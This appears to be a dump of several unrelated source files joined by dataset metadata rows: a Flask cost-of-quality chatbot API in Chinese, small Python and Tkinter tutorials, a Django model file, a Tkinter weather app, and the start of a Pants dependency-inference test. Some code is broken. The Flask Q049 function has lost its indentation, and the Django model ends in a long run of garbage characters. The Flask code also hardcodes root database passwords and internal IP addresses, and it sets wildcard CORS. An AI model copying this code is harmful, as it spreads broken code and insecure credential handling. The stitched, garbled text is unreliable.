    Query-string args: ``app``, ``Chat_ID``.  ``yearmonth`` is taken from the
    database, not the request.  Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        yearmonth = cur.fetchone()[0]
        returnData = OrderedDict()
        returnData[' '+str(yearmonth)+' '+app+'BU月圖']=''
        # Each BU sums a different slice of the a1..aN columns in
        # ``accumulation``; presumably the column offsets encode per-BU month
        # ranges — TODO confirm with the table owner.
        if app == '所有應用':
            cur.execute("SELECT IFNULL(a5,0)+IFNULL(a6,0)+IFNULL(a7,0)+IFNULL(a8,0) FROM accumulation where app='所有應用' and yearmonth=%s",(yearmonth))
        elif app == 'MD BU':
            cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='MD BU' and yearmonth=%s",(yearmonth))
        elif app == 'TV BU':
            cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='TV BU' and yearmonth=%s",(yearmonth))
        elif app == 'ITI BU':
            cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='ITI BU' and yearmonth=%s",(yearmonth))
        elif app == 'AA BU':
            cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='AA BU' and yearmonth=%s",(yearmonth))
        else :
            cur.execute("SELECT IFNULL(a8,0)+IFNULL(a9,0)+IFNULL(a10,0)+IFNULL(a11,0) FROM accumulation where app=%s and yearmonth=%s",(app,yearmonth))
        accumulationValue = cur.fetchone()[0]
        returnData['1. 截至'+str(yearmonth)+'累計CoQ目標'] = str(round(accumulationValue/1000000,1))+'M (NTD)'
        cur.execute('SELECT output1,output2,output3,output4,output5,output6 FROM remainCoQ where yearmonth = %s and application = %s',(yearmonth,app))
        for r in cur :
            returnData['2. 截至'+str(yearmonth)+'累計已支出CoQ'] = str(round(r[1]/1000000,1))+'M (NTD)'
            returnData['3. 年底達標預計可支出總CoQ'] = str(round(r[0]/1000000,1))+'M (NTD)'
            returnData['4. 年剩餘額度'] = str(round(r[2]/1000000,1))+'M (NTD)'
            returnData['5. 年剩餘可控額度'] = str(round(r[4]/1000000,1))+'M (NTD)'
            returnData['6. 年平均CoQ Rate'] = str(round(r[3]*100,2))+'%'
            returnData['7. 年供應商賠償總額'] = str(round(r[5]/1000000,1))+'M (NTD)'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q017',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 35. what CoQ is
@app.route("/Q035", methods=['GET'])
def Q035():
    """Static FAQ answer: definition of CoQ (Cost of Quality)."""
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['CoQ(Cost of Quality)'] = '指為了提高和保證產品品質而支出的一切費用,以及因產品品質未達到規定的要求而造成的一切損失的總和。'
    updateChat('', None, 'Q035', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 36. how the CoQ rate is computed
@app.route("/Q036", methods=['GET'])
def Q036():
    """Static FAQ answer: the CoQ rate formula."""
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['CoQ Rate'] = 'Σ(預防+鑑定+內失+外失)成本 / 營收'
    updateChat('', None, 'Q036', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 37. what the prevention cost is
@app.route("/Q037", methods=['GET'])
def Q037():
    """Static FAQ answer: academic and data definitions of prevention cost."""
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['學術定義'] = '用於避免生產出不良品而投入的成本。'
    payload['資料定義'] = 'DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
    updateChat('', None, 'Q037', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 38. what the appraisal cost is
@app.route("/Q038", methods=['GET'])
def Q038():
    """Static FAQ answer: academic and data definitions of appraisal cost."""
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['學術定義'] = '檢驗產品是否符合標準的成本。'
    payload['資料定義'] = 'DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
    updateChat('', None, 'Q038', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 39. what the external failure cost is
@app.route("/Q039", methods=['GET'])
def Q039():
    """Static FAQ answer: definitions of external failure cost.

    NOTE(review): the 資料定義 text here mentions in-plant scrap/rework, while
    Q040's mentions RMA returns — the two data definitions look swapped
    relative to their titles; confirm with the data owner before changing.
    """
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['學術定義'] = '產品運交至顧客後,因未能達到品質要求而造成的損失。'
    payload['資料定義'] = 'MQ/SQ的部份間接人事費用<br>產品於廠內執行報廢/重工/降等所產生的費用。'
    updateChat('', None, 'Q039', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 40. what the internal failure cost is
@app.route("/Q040", methods=['GET'])
def Q040():
    """Static FAQ answer: definitions of internal failure cost.

    NOTE(review): the 資料定義 text here mentions RMA returns, while Q039's
    mentions in-plant scrap — the two data definitions look swapped relative
    to their titles; confirm with the data owner before changing.
    """
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['學術定義'] = '產品運交至顧客前,因未能達到品質要求而造成的損失。'
    payload['資料定義'] = '1.RMA返品的維修、報廢、OBA/SORTING、賠償...等相關費用。<br>2.因品質問題導致營收減少的費用。<br>3.外失-其它:CQ/RMA的十大費用(排除營運費用)。'
    updateChat('', None, 'Q040', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 41. what the external failure warranty cost is
@app.route("/Q041", methods=['GET'])
def Q041():
    """Static FAQ answer: data definition of the external warranty cost."""
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['資料定義'] = 'RMA管理帳的費用。'
    updateChat('', None, 'Q041', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 42. what the internal AERB cost is
@app.route("/Q042", methods=['GET'])
def Q042():
    """Static FAQ answer: data definition of the AERB internal failure cost."""
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['資料定義'] = '廠內有標誌AERB,至降等或報廢的PANEL。'
    updateChat('', None, 'Q042', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 43. what the external rebate cost is
@app.route("/Q043", methods=['GET'])
def Q043():
    """Static FAQ answer: data definition of the external rebate cost."""
    chat_id = request.args.get('Chat_ID')
    payload = OrderedDict()
    payload['資料定義'] = 'CQE 客戶要求rebate的費用。'
    updateChat('', None, 'Q043', json.dumps(payload, ensure_ascii=False), chat_id)
    resp = jsonify(payload)
    resp.headers.add('Access-Control-Allow-Origin', '*')
    return resp
# 48. Q048 EXP 20200131
@app.route("/Q048", methods=['GET'])
def Q048():
    """Return the EXP share: sortings '01'-'04' as a percentage of the total
    cost over sortings '01'-'07'.

    Query-string args: ``app``, ``yearmonth`` (YYYYMM int, clamped to the
    newest fully-loaded month; YYYY00 means the whole year), ``Chat_ID``.
    Returns CORS-enabled JSON.
    """
    conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
    try:
        cur = conn.cursor()
        # Deliberately shadows the Flask ``app`` object (route already bound).
        app = request.args.get('app')
        yearmonth = int(request.args.get('yearmonth'))
        Chat_ID = request.args.get('Chat_ID')
        # Newest month with a complete data load (>300 rows present).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        if yearmonth == '' or yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "01", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "02", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "03", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "04", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
        EXPRate = cur.fetchone()[0]
        returnData = OrderedDict()
        # A month of 00 is the full-year sentinel row; label it accordingly.
        if yearmonth % 100 == 0 :
            yearmonthTmp = str(yearmonth//100)+'全年'
        else :
            yearmonthTmp = str(yearmonth)
        returnData[yearmonthTmp+' '+app+' EXP佔比'] = str(EXPRate)+'%'
        answerText = json.dumps(returnData,ensure_ascii=False)
        updateChat(app,yearmonth,'Q048',answerText,Chat_ID)
        response = jsonify(returnData)
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response
    finally:
        # Fix: the connection used to leak on every request.
        conn.close()
# 49. Q049 CoPQ 20200131
@app.route("/Q049", methods=['GET'])
def Q049():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "05", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "06", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "07", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
CoPQRate = cur.fetchone()[0];
returnData = OrderedDict();
if yearmonth % 100 == 0 :
yearmonthTmp = str(yearmonth//100)+'全年'
else :
yearmonthTmp = str(yearmonth)
returnData[yearmonthTmp+' '+app+' CoPQ佔比'] = str(CoPQRate)+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q049',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
if __name__ == '__main__':
localDB = False #False #True
if localDB == True :
host = '127.0.0.1'
port=3306
else :
#conn = pymysql.connect( host = '10.55.52.98' ,port=33060 , user = 'root' , passwd = "1234" , db = 'coq' )
#host = '10.56.211.124'
host = '10.55.52.98'
port=33060
#run_simple('10.55.8.201', 84, app)
app.run(host='0.0.0.0', port=83)
#run_simple('10.56.244.8', 84, app)
| [
"ukljm.2005@gmail.com"
] | ukljm.2005@gmail.com |
e25ee8942b20a0704262265705ad3ad2b5b7b407 | f99f30752e9bb9e023b37c731f64fb2155ac3daf | /03/zip.py | 69160f8e55ebbe1da4acd417e0cd571fe8488b3e | [] | no_license | chu83/python-basics | 148ff6977f5ca04775951d90ed1f5f763c51a9ff | 19fe0937842c668f604876be0aeb0962a2630dd2 | refs/heads/master | 2023-01-19T01:29:25.203738 | 2020-11-29T18:34:33 | 2020-11-29T18:34:33 | 311,258,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | print('========== zip() 함수 사용 예 ===========')
s1 = ['foo', 'bar', 'baz']
s2 = ['one', 'two', 'three', 'four']
z = zip(s1, s2)
print(z, type(z))
print('========== 순회1 ===========')
for t in z:
print(t, type(t))
z = zip(s1, s2)
for a, b in z:
print(a, b)
print('========== 순회2 ===========')
z = zip(s1, s2) | [
"59534807+chu83@users.noreply.github.com"
] | 59534807+chu83@users.noreply.github.com |
9aa6bf4b4b666c0fdab75fe77819b9f91a25419b | 3756d737b51b9d1518f689435f3414afec064f5d | /GUI/Spin Box Widget/Spin_box_widget_number.py | 57b3f7a8853b7e9f7f5d4d38582cc58541ed0745 | [] | no_license | SHUBHAM-BHATTACHARYA/Python-Program | 49e6e6b6e83b1313965c40d194df69b8ab580568 | 79fdba2904d01eb6ff1c161557673c7f14b9c225 | refs/heads/master | 2022-11-12T18:06:06.909797 | 2020-07-09T03:35:27 | 2020-07-09T03:35:27 | 278,025,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | from tkinter import *
window = Tk()
window.title("Welcome ")
window.geometry('350x200')
spin = Spinbox(window, values=(3, 8, 11), width=5)
spin.grid(column=0,row=0)
window.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
46dadcb89023a1f732e536ca17264b8cf5a87555 | f65e1d0f746d1c36392fe791b0277f6d3887cd95 | /print.py | dc9f4ab391cf9cd0e4eb58223a4e0bce82683056 | [] | no_license | trinitruong/learn-python | bb84189766ddcdd049da471374a3364aeba0c0a0 | 0148880e4cab028012b0c3505994a8bc92cf4c7b | refs/heads/master | 2021-02-08T02:54:48.425636 | 2020-03-15T05:44:23 | 2020-03-15T05:44:23 | 244,101,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 852 | py | #to print verbatim use print() function
def main():
# print a string to the console/terminal
#use single or double quotes inside parenthesis to create string
print("something")
# print a variable
#a is the variable, 321321 is value assigned to variable
a = 321321
print(a)
b = "afhgdsgds"
print(b)
c = 7.62863
print(c)
if __name__ == "__main__":
main()
# string are defined with a single or double quote
# when string is printed, it will print verbatim
print("keep going")
# strings can also be assigned to a variable
k = "Don't stop"
print(k)
# multiple variables can be assigned on one line:
x, y, z = 'one', 'two', 'three'
print(x,y,z)
h, j, t = 2, 3, 4
print(h,j,t)
# can print any combination of variables because they are all numbers
# can not print mix of numbers & strings
print(z,j,x)
| [
"trinitruong001@gmail.com"
] | trinitruong001@gmail.com |
9dad79201f18f38def9a65250a4156fddfac10ec | 0a01b20dade2c968ebb0b4f4f8425c22b1c9b8c4 | /WebApp/models.py | 55b15b803a321a5580dbb1a33fdd896e1a8ba27a | [] | no_license | avitko001c/django_project | 216ca1b2953c6c92a2db63961a8567dfd6d6294f | 1bca2809b30ef7523d628f38e4d219f0f79bf6cb | refs/heads/master | 2022-12-13T22:58:36.222258 | 2020-09-13T23:40:45 | 2020-09-13T23:40:45 | 295,257,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | from django.db import models
from django.db.models.fields.json import JSONField
from django_mysql.models import ListCharField
from django.db.models.fields import *
from django.utils.importlib import import_module
# Create your models here.
class Email(models.Model):
headers = JSONField()
email_to = ListCharField(base_field=EmailField())
email_from = EmailField()
bcc = ListCharField(base_field=EmailField())
cc = ListCharField(base_field=EmailField())
subject = CharField()
raw_email = JSONField()wajyhggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg | [
"andrewvitko@gmail.com"
] | andrewvitko@gmail.com |
0d543afecf4a0144548d3602be45f8e851f1657b | a61dae5e34605f708cec4ba661a3e6d2ed78ab73 | /Weather/GUI.py | 595c6a018becfbd6c4cf78563b0fa83b0d9947dd | [] | no_license | ChyiYaqing/PythonPrj | a475c2f83db2a607377d24a78a8c0aa1220229e3 | a7f8e9c0263b4f0f3827c5488ab4fed002962a1b | refs/heads/master | 2020-06-02T01:27:05.095901 | 2017-06-25T12:48:30 | 2017-06-25T12:48:30 | 94,090,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,424 | py | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
try:
# for Python2
from Tkinter import * ## notice capitalized T in Tkinter
except ImportError:
# for Python3
from tkinter import * ## notice lowercase 't' in tkinter here
from Weathers import *
import urllib2
from threading import Thread
import tkMessageBox
from sys import exit
class MyThread(Thread):
def run(self):
tkMessageBox.showinfo("Error", "The City Is Not Exist!")
class Top(Frame):
def __init__(self, master=None, content=None, chart=None, today=None):
Frame.__init__(self, master)
self.content = content
self.master = master
self.chart = chart
self.today = today
self.createWidget()
def createWidget(self):
self.e = StringVar()
self.top = LabelFrame(self, text = 'City Name', padx = 5, pady = 5)
#create the LabelFrame widget with string 'City Name'
self.e.set(self.content.weathers.city)
#set the varible of type of StringVar as self.cityname
self.entry = Entry(self.top, width=29, textvariable=self.e)
#create the Entry widget
self.submitbutton = Button(self.top, text = "submit", command=self.submitcity)
#create the Button widget
self.submitbutton.bind("<Return>", self.submitcity)
#bind the Button namely submit with Enter Key in keyboard
self.entry.pack(side='left')
self.submitbutton.pack(side="right")
self.top.pack(fill=X)
#place the widgets on frame namely Top
#define the function namely submit and it is the activity of button namely submit
def submitcity(self):
lastcityname = self.content.weathers.city
#backup the cityname as lastcityname
cityname = self.entry.get().capitalize()
#make cityname as a same formate
if self.content.updateWeathers(cityname) == 1:
MyThread().start()
cityname = lastcityname
self.e.set(lastcityname)
else:
self.chart.updateLineChart()
self.today.updateToday()
class Today(Frame):
def __init__(self, master=None, content=None):
Frame.__init__(self, master)
self.content = content
self.createWidget()
def createWidget(self):
self.today = LabelFrame(self, text='today')
self.img = PhotoImage(file='Today.gif')
self.canvas = Canvas(self.today, height=90)
self.item1 = self.canvas.create_image(150, 50, image=self.img)
self.item2 = self.canvas.create_text(20, 10, text=self.content.weathers.day[0])
self.item3 = self.canvas.create_text(80, 10, text=self.content.weathers.date[0])
self.item4 = self.canvas.create_text(150, 80, text=self.content.weathers[0].mindegree + 'C ~ ' + self.content.weathers[0].maxdegree + 'C')
self.canvas.pack(fill=X)
self.today.pack(fill=X)
def updateToday(self):
self.img = PhotoImage(file='Today.gif')
self.canvas.itemconfigure(self.item1, image=self.img)
self.canvas.itemconfigure(self.item2, text=self.content.weathers.day[0])
self.canvas.itemconfigure(self.item3, text=self.content.weathers.date[0])
self.canvas.itemconfigure(self.item4, text=self.content.weathers[0].mindegree + 'C ~ ' + self.content.weathers[0].maxdegree + 'C')
class Content(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.weathers = Weathers()
self.weathers.setDefaultCity()
self.createWidget()
self.initWeathers()
def createWidget(self):
self.labels = [];
#self.today = LabelFrame(self, text = 'Today Weather', padx = 5, pady = 5)
self.feture = LabelFrame(self, text = 'Feture Weather', padx = 5, pady = 5)
#self.label.pack()
self.labels.append(Label(self, justify = 'left', anchor = 'w', fg = 'red'))
#self.labels[0].pack(fill=X)
for i in range(1, 5):
self.labels.append(Label(self.feture, justify = 'left', anchor = 'w'))
self.labels[i].pack(fill=X)
#self.today.pack(fill=X)
self.feture.pack(fill=X)
def initWeathers(self):
try:
self.weathers.setURL()
self.weathers.setWeathersFromInternet()
except urllib2.URLError:
tkMessageBox.showinfo("Error", "Please check connect!")
exit(0)
for i, wea in enumerate(self.weathers, start=0):
self.labels[i]['text'] = wea.message
#fill in message in the text of labels
def updateWeathers(self, cityname):
self.weathers.setCity(cityname)
self.weathers.setURL()
try:
if self.weathers.setWeathersFromInternet() == 1:
return 1
except urllib2.URLError:
tkMessageBox.showinfo("Error", "Please check connect!")
exit(0)
for i, wea in enumerate(self.weathers, start=0):
self.labels[i]['text'] = wea.message
self.weathers.saveWeathers()
return 0
class LineChart(Frame):
def __init__(self, master=None, content=None):
Frame.__init__(self, master)
self.content = content
self.createWidget()
self.initChart()
self.drawLineChart()
def createWidget(self):
self.chartframe = LabelFrame(self, text = 'LineChart', padx = 5, pady = 5);
self.chart = Canvas(self.chartframe, height=200)
self.chartframe.pack(fill=X)
self.chart.pack()
img = PhotoImage(file='./icon/purple_retina.gif')
self.label = Label(self)
self.label.configure(image=img)
self.label.image = img
self.label.pack(side='right')
def initChart(self):
self.chart.create_line(20, 20, 20, 180, fill='black')
#y
self.chart.create_line(10, 170, 270, 170, fill='black')
#x
self.chart.create_line(15, 25, 20, 20, fill='black');
self.chart.create_line(25, 25, 20, 20, fill='black');
#y
self.chart.create_line(265, 165, 270, 170, fill='black');
self.chart.create_line(265, 175, 270, 170, fill='black');
for i in range(0, 5):
self.chart.create_line(40 * i + 60, 170, 40 * i + 60, 165, fill='black')
def drawLineChart(self):
self.pointmax = []
self.pointmin = []
self.minmin = sorted(self.content.weathers.mindegree)[0]
self.maxmax = sorted(self.content.weathers.maxdegree)[len(self.content.weathers.maxdegree) - 1]
self.gap = 150 / (self.maxmax - self.minmin) - 1
for i, d in enumerate(self.content.weathers.maxdegree[0:6]):
self.pointmax.append((170 - ((d - self.minmin) * self.gap) - 10, 60 + i * 40))
for i, d in enumerate(self.content.weathers.mindegree[0:6]):
self.pointmin.append((170 - ((d - self.minmin) * self.gap) - 10, 60 + i * 40))
for i, wea in enumerate(self.content.weathers, start=0):
self.chart.create_text(40 * i + 60, 175, text=wea.date.split()[0])
for i in range(1, len(self.pointmax)):
self.chart.create_line(20, self.pointmax[i - 1][0], 25, self.pointmax[i - 1][0], fill='red')
self.chart.create_text(30, self.pointmax[i - 1][0], text=self.content.weathers[i - 1].maxdegree, fill='red')
self.chart.create_line(self.pointmax[i - 1][1], self.pointmax[i - 1][0], self.pointmax[i][1], self.pointmax[i][0], fill='red')
self.chart.create_line(20, self.pointmax[len(self.pointmax) - 1][0], 25, self.pointmax[len(self.pointmax) - 1][0], fill='red')
self.chart.create_text(30, self.pointmax[len(self.pointmax) - 1][0], text=self.content.weathers[len(self.pointmax) - 1].maxdegree, fill='red');
for i in range(1, len(self.pointmin)):
self.chart.create_line(15, self.pointmin[i - 1][0], 20, self.pointmin[i - 1][0], fill='blue')
self.chart.create_text(10, self.pointmin[i - 1][0], text=self.content.weathers[i - 1].mindegree, fill='blue');
self.chart.create_line(self.pointmin[i - 1][1], self.pointmin[i - 1][0], self.pointmin[i][1], self.pointmin[i][0], fill='blue')
self.chart.create_line(15, self.pointmin[len(self.pointmin) - 1][0], 20, self.pointmin[len(self.pointmin) - 1][0], fill='blue')
self.chart.create_text(10, self.pointmin[len(self.pointmin) - 1][0], text=self.content.weathers[len(self.pointmin) - 1].mindegree, fill='blue');
def updateLineChart(self):
self.chart.delete(ALL)
self.initChart()
self.drawLineChart()
def GUI():
root = Tk(className='MyWeather')
root.resizable(width = False, height = False)
content = Content(root)
today = Today(root, content)
chart = LineChart(root, content)
top = Top(root, content, chart, today)
top.pack(fill=X)
today.pack(fill=X)
content.pack(fill=X)
chart.pack(fill=X)
root.mainloop()
| [
"chyiyaqing@gmail.com"
] | chyiyaqing@gmail.com |
69bf16c29bc8a1c8b61bf4115da050289a9cb9c5 | 1d51cca8970f466f88c97aa36f4b8cd76bd50583 | /bits_iot_button_pressed.py | 12769c0a231cc02cd971c13cd0f3115f9d5a405e | [] | no_license | hughgardiner/bits-iot-button | 1009051bc474b52e39eeda008088105b492cfcaf | 2155814bff46837ef9d2bb0debc3e3fe9c461762 | refs/heads/master | 2020-04-30T06:06:17.609488 | 2019-03-20T03:09:54 | 2019-03-20T03:09:54 | 176,642,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | import requests
def lambda_handler(event, context):
request = requests.post(url = 'https://hooks.slack.com/services/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', json = {'text':'andon IOT Button Pressed'})
return request.text | [
"gardinerhugh6@gmail.com"
] | gardinerhugh6@gmail.com |
041350efe6b160a115e9e22c301c74a34ff53193 | 71257430418ed7410ddffb6df692a5e816eb53b7 | /61hunter.py | ed47aa6e3c043824bfe5d9b810408fd96bd965c2 | [] | no_license | aarthisandhiya/aarthi | 917283541b9aa133db5d50a3b68eda2a10c38af7 | 00b31831832ea573dfd886eb0001ad824325136d | refs/heads/master | 2020-04-15T05:10:42.585357 | 2019-07-21T13:57:58 | 2019-07-21T13:57:58 | 164,411,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | a=int(input())
c=0
b=[int(a) for a in input().split()]
u,v=map(int,input().split())
for i in range(0,len(b)):
if b[i]==u:
while b[i]<int(v):
c=c+1
i=i+1
print(c)
| [
"noreply@github.com"
] | noreply@github.com |
6ab55be04331c76cccf1ce24dfa50f5dc47cd8ca | 4de8ee1711ab8b74f003217ecde93087db69b79c | /src/python/pants/backend/python/dependency_inference/rules_test.py | 903e2bb05e825e10dba91dab777479ebf72e7ae4 | [
"Apache-2.0"
] | permissive | TansyArron/pants | 45b19496a29aa962da22cb83b75e53d3c4ab291a | 20c8e11460ef9e7d9bfce12504f27729db7cc929 | refs/heads/master | 2022-12-09T01:34:39.535612 | 2022-12-05T20:47:31 | 2022-12-05T20:47:31 | 40,982,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,305 | py | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
from typing import Iterable
import pytest
from pants.backend.python import target_types_rules
from pants.backend.python.dependency_inference.module_mapper import PythonModuleOwners
from pants.backend.python.dependency_inference.parse_python_dependencies import (
ParsedPythonImportInfo,
ParsedPythonImports,
)
from pants.backend.python.dependency_inference.rules import (
ConftestDependenciesInferenceFieldSet,
ImportOwnerStatus,
ImportResolveResult,
InferConftestDependencies,
InferInitDependencies,
InferPythonImportDependencies,
InitDependenciesInferenceFieldSet,
InitFilesInference,
PythonImportDependenciesInferenceFieldSet,
PythonInferSubsystem,
UnownedDependencyError,
UnownedDependencyUsage,
UnownedImportsPossibleOwners,
UnownedImportsPossibleOwnersRequest,
_find_other_owners_for_unowned_imports,
_get_imports_info,
import_rules,
infer_python_conftest_dependencies,
infer_python_init_dependencies,
)
from pants.backend.python.macros import python_requirements
from pants.backend.python.macros.python_requirements import PythonRequirementsTargetGenerator
from pants.backend.python.target_types import (
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
PythonSourceTarget,
PythonTestsGeneratorTarget,
PythonTestUtilsGeneratorTarget,
)
from pants.backend.python.util_rules import ancestor_files
from pants.core.target_types import FilesGeneratorTarget, ResourcesGeneratorTarget
from pants.core.target_types import rules as core_target_types_rules
from pants.engine.addresses import Address
from pants.engine.internals.parametrize import Parametrize
from pants.engine.rules import SubsystemRule, rule
from pants.engine.target import ExplicitlyProvidedDependencies, InferredDependencies
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, QueryRule, RuleRunner, engine_error
from pants.util.ordered_set import FrozenOrderedSet
from pants.util.strutil import softwrap
def test_infer_python_imports(caplog) -> None:
rule_runner = RuleRunner(
rules=[
*import_rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
QueryRule(InferredDependencies, [InferPythonImportDependencies]),
],
target_types=[PythonSourcesGeneratorTarget, PythonRequirementTarget],
)
rule_runner.write_files(
{
"3rdparty/python/BUILD": dedent(
"""\
python_requirement(
name='Django',
requirements=['Django==1.21'],
)
"""
),
# If there's a `.py` and `.pyi` file for the same module, we should infer a dependency on both.
"src/python/str_import/subdir/f.py": "",
"src/python/str_import/subdir/f.pyi": "",
"src/python/str_import/subdir/BUILD": "python_sources()",
"src/python/util/dep.py": "",
"src/python/util/BUILD": "python_sources()",
"src/python/app.py": dedent(
"""\
import django
import unrecognized.module
from util.dep import Demo
from util import dep
"""
),
"src/python/f2.py": dedent(
"""\
import typing
# Import from another file in the same target.
from app import main
# Dynamic string import.
importlib.import_module('str_import.subdir.f')
"""
),
"src/python/BUILD": "python_sources()",
}
)
def run_dep_inference(
address: Address, *, enable_string_imports: bool = False
) -> InferredDependencies:
args = [
"--source-root-patterns=src/python",
"--python-infer-unowned-dependency-behavior=ignore",
]
if enable_string_imports:
args.append("--python-infer-string-imports")
rule_runner.set_options(args, env_inherit={"PATH", "PYENV_ROOT", "HOME"})
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[
InferPythonImportDependencies(
PythonImportDependenciesInferenceFieldSet.create(target)
)
],
)
assert run_dep_inference(
Address("src/python", relative_file_path="app.py")
) == InferredDependencies(
[
Address("3rdparty/python", target_name="Django"),
Address("src/python/util", relative_file_path="dep.py"),
],
)
addr = Address("src/python", relative_file_path="f2.py")
assert run_dep_inference(addr) == InferredDependencies(
[Address("src/python", relative_file_path="app.py")]
)
assert run_dep_inference(addr, enable_string_imports=True) == InferredDependencies(
[
Address("src/python", relative_file_path="app.py"),
Address("src/python/str_import/subdir", relative_file_path="f.py"),
Address("src/python/str_import/subdir", relative_file_path="f.pyi"),
],
)
# Test handling of ambiguous imports. We should warn on the ambiguous dependency, but not warn
# on the disambiguated one and should infer a dep.
caplog.clear()
rule_runner.write_files(
{
"src/python/ambiguous/dep.py": "",
"src/python/ambiguous/disambiguated_via_ignores.py": "",
"src/python/ambiguous/main.py": (
"import ambiguous.dep\nimport ambiguous.disambiguated_via_ignores\n"
),
"src/python/ambiguous/BUILD": dedent(
"""\
python_sources(name='dep1', sources=['dep.py', 'disambiguated_via_ignores.py'])
python_sources(name='dep2', sources=['dep.py', 'disambiguated_via_ignores.py'])
python_sources(
name='main',
sources=['main.py'],
dependencies=['!./disambiguated_via_ignores.py:dep2'],
)
"""
),
}
)
assert run_dep_inference(
